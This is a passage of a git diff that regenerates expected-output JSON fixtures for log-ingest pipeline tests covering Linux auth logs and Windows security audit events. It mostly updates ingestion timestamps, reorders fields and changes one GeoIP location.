"ingested": "2021-12-09T13:45:42.694600700Z", + "ingested": "2021-12-14T14:55:36.054847688Z", "timezone": "+0000", "kind": "event" } 
@@ -358,7 +358,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-12-09T13:45:42.694605900Z", + "ingested": "2021-12-14T14:55:36.054848053Z", "timezone": "+0000", "kind": "event" }, @@ -401,7 +401,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-12-09T13:45:42.694611200Z", + "ingested": "2021-12-14T14:55:36.054848406Z", "timezone": "+0000", "kind": "event" }, @@ -433,7 +433,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-12-09T13:45:42.694616600Z", + "ingested": "2021-12-14T14:55:36.054848751Z", "category": [ "iam" ], @@ -479,7 +479,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-12-09T13:45:42.694621900Z", + "ingested": "2021-12-14T14:55:36.054849097Z", "category": [ "iam" ], diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log-expected.json b/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log-expected.json index 2cd21b406b8..39153453ec4 100644 --- a/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log-expected.json +++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log-expected.json @@ -34,14 +34,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -54,7 +54,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:45:43.392072100Z", + "ingested": "2021-12-14T14:55:36.752110710Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -95,7 +95,7 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-12-09T13:45:43.392079Z", + "ingested": "2021-12-14T14:55:36.752190528Z", "timezone": "+0000", "kind": "event" }, 
@@ -125,7 +125,7 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-12-09T13:45:43.392082800Z", + "ingested": "2021-12-14T14:55:36.752190973Z", "timezone": "+0000", "kind": "event" }, @@ -152,7 +152,7 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-12-09T13:45:43.392087500Z", + "ingested": "2021-12-14T14:55:36.752191316Z", "timezone": "+0000", "kind": "event" }, @@ -179,7 +179,7 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-12-09T13:45:43.392091200Z", + "ingested": "2021-12-14T14:55:36.752214504Z", "timezone": "+0000", "kind": "event" }, @@ -206,7 +206,7 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-12-09T13:45:43.392095700Z", + "ingested": "2021-12-14T14:55:36.752214943Z", "timezone": "+0000", "kind": "event" }, @@ -243,7 +243,7 @@ "hostname": "slave22" }, "event": { - "ingested": "2021-12-09T13:45:43.392101200Z", + "ingested": "2021-12-14T14:55:36.752215290Z", "timezone": "+0000", "kind": "event" }, diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-timestamp.log-expected.json b/packages/system/data_stream/auth/_dev/test/pipeline/test-timestamp.log-expected.json index 024b2254770..b7805e870c5 100644 --- a/packages/system/data_stream/auth/_dev/test/pipeline/test-timestamp.log-expected.json +++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-timestamp.log-expected.json @@ -24,7 +24,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-12-09T13:45:43.747682Z", + "ingested": "2021-12-14T14:55:37.123383287Z", "timezone": "+0000", "kind": "event" }, @@ -57,7 +57,7 @@ "hostname": "localhost" }, "event": { - "ingested": "2021-12-09T13:45:43.747690700Z", + "ingested": "2021-12-14T14:55:37.123385539Z", "timezone": "+0000", "kind": "event" }, diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-1100.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-1100.json-expected.json index f5f8681e353..a3551f1f53d 100644 
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-1100.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-1100.json-expected.json @@ -43,7 +43,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:43.972797500Z", + "ingested": "2021-12-14T14:55:37.404875412Z", "code": "1100", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-1102.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-1102.json-expected.json index dd880a80804..eaef4bee0f6 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-1102.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-1102.json-expected.json @@ -58,7 +58,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:44.108025700Z", + "ingested": "2021-12-14T14:55:37.526510977Z", "code": "1102", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-1104.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-1104.json-expected.json index 209697bd443..6e53c341318 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-1104.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-1104.json-expected.json @@ -43,7 +43,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:44.290473500Z", + "ingested": "2021-12-14T14:55:37.704135348Z", "code": "1104", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-1105.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-1105.json-expected.json index 229ed6b96ef..7b2fa535847 100644 
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-1105.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-1105.json-expected.json @@ -48,7 +48,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:44.408439300Z", + "ingested": "2021-12-14T14:55:37.821126911Z", "code": "1105", "provider": "Microsoft-Windows-Eventlog", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4663.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4663.json-expected.json index 0a2df7e9eae..29221a9d4ec 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4663.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4663.json-expected.json @@ -74,7 +74,7 @@ "name": "DC01.contoso.local" }, "event": { - "ingested": "2021-12-09T13:45:44.539859Z", + "ingested": "2021-12-14T14:55:37.953547417Z", "code": "4663", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4670-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4670-windowssrv2016.json-expected.json index 9c85d035dd3..5323eea3b2a 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4670-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4670-windowssrv2016.json-expected.json @@ -13,6 +13,7 @@ "pid": 764, "executable": "C:\\Windows\\System32\\services.exe" }, + "@timestamp": "2020-07-28T13:22:18.799Z", "winlog": { "computer_name": "WIN-BVM4LI1L1Q6.TEST.local", "process": { 
@@ -54,13 +55,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4670_WindowsSrv2016.xml" - } - }, - "@timestamp": "2020-07-28T13:22:18.799Z", "ecs": { "version": "1.12.0" }, @@ -69,11 +63,17 @@ "WIN-BVM4LI1L1Q6$" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4670_WindowsSrv2016.xml" + } + }, "host": { "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:44.690319700Z", + "ingested": "2021-12-14T14:55:38.105503646Z", "code": "4670", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4674.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4674.json-expected.json index 469ff90b096..a480dfbf90c 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4674.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4674.json-expected.json @@ -78,7 +78,7 @@ "name": "DC01.contoso.local" }, "event": { - "ingested": "2021-12-09T13:45:44.903413300Z", + "ingested": "2021-12-14T14:55:38.313035152Z", "code": "4674", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4706-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4706-windowssrv2016.json-expected.json index 54b8be2335c..8a39a9ae36b 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4706-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4706-windowssrv2016.json-expected.json 
@@ -67,7 +67,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:45.106391100Z", + "ingested": "2021-12-14T14:55:38.531126868Z", "code": "4706", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4707-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4707-windowssrv2016.json-expected.json index 5b16cece242..2d2ff8f6040 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4707-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4707-windowssrv2016.json-expected.json @@ -59,7 +59,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:45.304077500Z", + "ingested": "2021-12-14T14:55:38.724210038Z", "code": "4707", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4713-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4713-windowssrv2016.json-expected.json index d79374ea1ce..3b3dacb8cb6 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4713-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4713-windowssrv2016.json-expected.json @@ -59,7 +59,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:45.483796500Z", + "ingested": "2021-12-14T14:55:38.905610976Z", "code": "4713", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4716-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4716-windowssrv2016.json-expected.json index 14e520329c0..aed04fb8c0b 100644 
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4716-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4716-windowssrv2016.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:45.661333200Z", + "ingested": "2021-12-14T14:55:39.091184694Z", "code": "4716", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4717-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4717-windowssrv2016.json-expected.json index 0eda1467ded..d9561e4e5a6 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4717-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4717-windowssrv2016.json-expected.json @@ -60,7 +60,7 @@ "name": "WIN-BVM4LI1L1Q6" }, "event": { - "ingested": "2021-12-09T13:45:45.852303500Z", + "ingested": "2021-12-14T14:55:39.287024273Z", "code": "4717", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4718-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4718-windowssrv2016.json-expected.json index 35e09f28bef..0a29747e219 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4718-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4718-windowssrv2016.json-expected.json @@ -60,7 +60,7 @@ "name": "WIN-BVM4LI1L1Q6" }, "event": { - "ingested": "2021-12-09T13:45:46.036199Z", + "ingested": "2021-12-14T14:55:39.461239359Z", "code": "4718", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", 
diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4719-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4719-windowssrv2016.json-expected.json index cbe653566e4..d425afdf396 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4719-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4719-windowssrv2016.json-expected.json @@ -67,7 +67,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:46.213355200Z", + "ingested": "2021-12-14T14:55:39.642872904Z", "code": "4719", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4719.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4719.json-expected.json index 33448147c89..15335c32486 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4719.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4719.json-expected.json @@ -68,7 +68,7 @@ "name": "WIN-41OB2LO92CR.wlbeat.local" }, "event": { - "ingested": "2021-12-09T13:45:46.399837400Z", + "ingested": "2021-12-14T14:55:39.829378557Z", "code": "4719", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4739-windowssrv2016.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4739-windowssrv2016.json-expected.json index bb727351068..4ac4f87593a 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4739-windowssrv2016.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4739-windowssrv2016.json-expected.json 
@@ -66,7 +66,7 @@ "name": "WIN-BVM4LI1L1Q6.TEST.local" }, "event": { - "ingested": "2021-12-09T13:45:46.588490400Z", + "ingested": "2021-12-14T14:55:40.014118672Z", "code": "4739", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4743.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4743.json-expected.json index 5b1f65f4192..730bf8cca46 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4743.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4743.json-expected.json @@ -68,7 +68,7 @@ "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:46.772189Z", + "ingested": "2021-12-14T14:55:40.204889270Z", "code": "4743", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4744.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4744.json-expected.json index ba037feef6c..32f3d91ec72 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4744.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4744.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-18T16:26:46.874Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4744.xml" - } - }, - "@timestamp": "2019-12-18T16:26:46.874Z", "ecs": { "version": "1.12.0" }, 
@@ -59,11 +53,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4744.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:46.953035400Z", + "ingested": "2021-12-14T14:55:40.391162113Z", "code": "4744", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4745.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4745.json-expected.json index 0f4f115b078..e67540c1973 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4745.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4745.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-18T16:29:05.017Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4745.xml" - } - }, - "@timestamp": "2019-12-18T16:29:05.017Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4745.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:47.159830400Z", + "ingested": "2021-12-14T14:55:40.582677378Z", "code": "4745", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4746.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4746.json-expected.json index 080211b5cbb..6a351afd0f1 100644 
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4746.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4746.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-18T16:31:01.611Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4746.xml" - } - }, - "@timestamp": "2019-12-18T16:31:01.611Z", "ecs": { "version": "1.12.0" }, @@ -60,11 +54,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4746.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:47.362122900Z", + "ingested": "2021-12-14T14:55:40.782975453Z", "code": "4746", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4747.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4747.json-expected.json index 6747dcd6d3b..8635a3f2460 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4747.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4747.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-18T16:35:16.681Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { 
@@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4747.xml" - } - }, - "@timestamp": "2019-12-18T16:35:16.681Z", "ecs": { "version": "1.12.0" }, @@ -60,11 +54,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4747.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:47.619501500Z", + "ingested": "2021-12-14T14:55:41.047058970Z", "code": "4747", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4748.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4748.json-expected.json index 5284df6be39..cb5edaaa835 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4748.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4748.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:01:45.982Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -42,13 +43,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4748.xml" - } - }, - "@timestamp": "2019-12-19T08:01:45.982Z", "ecs": { "version": "1.12.0" }, 
@@ -57,11 +51,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4748.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:47.872340400Z", + "ingested": "2021-12-14T14:55:41.305165933Z", "code": "4748", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4749.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4749.json-expected.json index 664c3099fc3..1ff77cc16ac 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4749.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4749.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:03:42.723Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4749.xml" - } - }, - "@timestamp": "2019-12-19T08:03:42.723Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4749.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:48.060639100Z", + "ingested": "2021-12-14T14:55:41.501015864Z", "code": "4749", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4750.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4750.json-expected.json index c1269a77ab7..7ac51b173fc 100644 
--- a/packages/system/data_stream/security/_dev/test/pipeline/test-4750.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4750.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:10:57.473Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4750.xml" - } - }, - "@timestamp": "2019-12-19T08:10:57.473Z", "ecs": { "version": "1.12.0" }, @@ -59,11 +53,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4750.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:48.257955300Z", + "ingested": "2021-12-14T14:55:41.693592463Z", "code": "4750", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4751.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4751.json-expected.json index 8dfdfc48e48..baaddd72d20 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4751.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4751.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:20:29.088Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { 
@@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4751.xml" - } - }, - "@timestamp": "2019-12-19T08:20:29.088Z", "ecs": { "version": "1.12.0" }, @@ -60,11 +54,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4751.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:48.462964900Z", + "ingested": "2021-12-14T14:55:41.892709660Z", "code": "4751", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4752.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4752.json-expected.json index 442e3fd7d1b..8ac9597db55 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4752.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4752.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:21:23.644Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -44,13 +45,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4752.xml" - } - }, - "@timestamp": "2019-12-19T08:21:23.644Z", "ecs": { "version": "1.12.0" }, 
@@ -60,11 +54,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4752.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:48.720114100Z", + "ingested": "2021-12-14T14:55:42.161596899Z", "code": "4752", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4753.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4753.json-expected.json index 295846351c0..3686c518008 100644 --- a/packages/system/data_stream/security/_dev/test/pipeline/test-4753.json-expected.json +++ b/packages/system/data_stream/security/_dev/test/pipeline/test-4753.json-expected.json @@ -8,6 +8,7 @@ "type": "filebeat", "version": "8.0.0" }, + "@timestamp": "2019-12-19T08:24:36.595Z", "winlog": { "computer_name": "DC_TEST2k12.TEST.SAAS", "process": { @@ -42,13 +43,6 @@ "provider_name": "Microsoft-Windows-Security-Auditing", "outcome": "success" }, - "log": { - "level": "information", - "file": { - "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4753.xml" - } - }, - "@timestamp": "2019-12-19T08:24:36.595Z", "ecs": { "version": "1.12.0" }, @@ -57,11 +51,17 @@ "at_adm" ] }, + "log": { + "level": "information", + "file": { + "path": "/Users/leehinman/src/beats/x-pack/winlogbeat/module/security/test/testdata/4753.xml" + } + }, "host": { "name": "DC_TEST2k12.TEST.SAAS" }, "event": { - "ingested": "2021-12-09T13:45:48.972013Z", + "ingested": "2021-12-14T14:55:42.422808512Z", "code": "4753", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", diff --git a/packages/system/data_stream/security/_dev/test/pipeline/test-4759.json-expected.json b/packages/system/data_stream/security/_dev/test/pipeline/test-4759.json-expected.json index 18dece12a65..2e4cae9d69e 100644 
